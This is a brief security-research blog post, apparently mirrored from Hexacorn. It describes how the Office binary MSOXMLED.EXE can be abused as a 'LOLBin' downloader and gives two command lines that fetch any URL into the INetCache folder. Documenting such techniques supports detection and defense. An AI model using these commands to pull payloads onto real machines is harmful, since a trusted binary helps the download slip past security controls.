Desperate downloader lolbin
2021-02-06 08:41:33 Author: www.hexacorn.com(查看原文) 阅读量:259 收藏

February 5, 2021 in LOLBins

I was toying around with the Office application MSOXMLED.EXE and noticed it handles URLs. Thanks to that it can be used to download file to internet cache folder as shown below:

There are at least two different ways to invoke it:

MSOXMLED.EXE /verb open [URL]
MSOXMLED.EXE /verb [anything] /genverb open [URL]

and the file is being downloaded to the InetCache folder:

c:\Users\[user]\AppData\Local\Microsoft\Windows\INetCache\Low\IE\[random]\[file]

The caveat is that it seems to be using Internet Explorer as a proxy, hence the iexplore.exe will be spawn.

Lame, not very ‘finesse’, but at least documented.


文章来源: https://www.hexacorn.com/blog/2021/02/05/desperate-downloader-lolbin/
如有侵权请联系:admin#unsafe.sh